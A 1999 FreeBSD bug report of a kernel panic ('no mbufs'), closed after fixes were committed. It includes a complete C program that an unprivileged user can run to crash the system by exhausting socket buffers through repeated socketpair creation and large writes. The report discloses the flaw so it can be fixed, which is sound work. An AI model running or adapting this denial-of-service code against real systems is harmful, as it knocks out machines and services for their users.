Bug 14226

Summary: panic: no mbufs
Product: Base System
Reporter: jar <jar>
Component: kern
Assignee: Brian Feldman <green>
Status: Closed FIXED
Severity: Affects Only Me
Priority: Normal
Version: Unspecified
Hardware: Any
OS: Any

Description jar 1999-10-09 10:40:00 UTC
The following program, run by any unprivileged user,
crashes FreeBSD 3.3-RC (RELEASE and STABLE as well):

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>
#include        <stdlib.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}

How-To-Repeat: Build and run the program

Comment 1 bmilekic@dsuper.net 1999-12-06 02:09:22 UTC
  Yaroslav,

  I would recommend for you to take a look at PR: kern/14042 -- I filed
  this just a few days before you filed yours.

  In effect, the PR deals with the same situation, and offers a
  potential element in helping solve it (in addition to sbsize limiting
  through login.conf -- unfortunately only available for -CURRENT at the
  present time). I would recommend that you post further feedback, if you
  still feel that it is necessary in response to that PR, so that someone
  with the proper privileges may close this one, so that the number of
  duplicate PRs may go down. I for one am thankful for your initial posting
  and hope that you will find time to contribute to solving further
  problems, if the need arises.

  -Bosko.

--
  Bosko Milekic <bmilekic@technokratis.com>

Comment 2 bill fumerola freebsd_committer freebsd_triage 1999-12-13 21:22:26 UTC
State Changed
From-To: open->closed

Fixes were committed to -CURRENT to stop this, see
kern/14042.

Comment 3 bill fumerola freebsd_committer freebsd_triage 1999-12-13 21:22:26 UTC
Responsible Changed
From-To: freebsd-bugs->green

Brian committed the fixes to stop this.